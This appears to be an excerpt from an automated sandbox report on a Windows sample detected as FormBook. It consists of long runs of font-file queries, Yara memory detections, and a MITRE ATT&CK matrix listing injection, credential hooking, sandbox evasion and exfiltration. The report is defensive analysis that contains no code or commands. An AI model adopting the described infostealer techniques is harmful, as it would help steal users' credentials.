          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
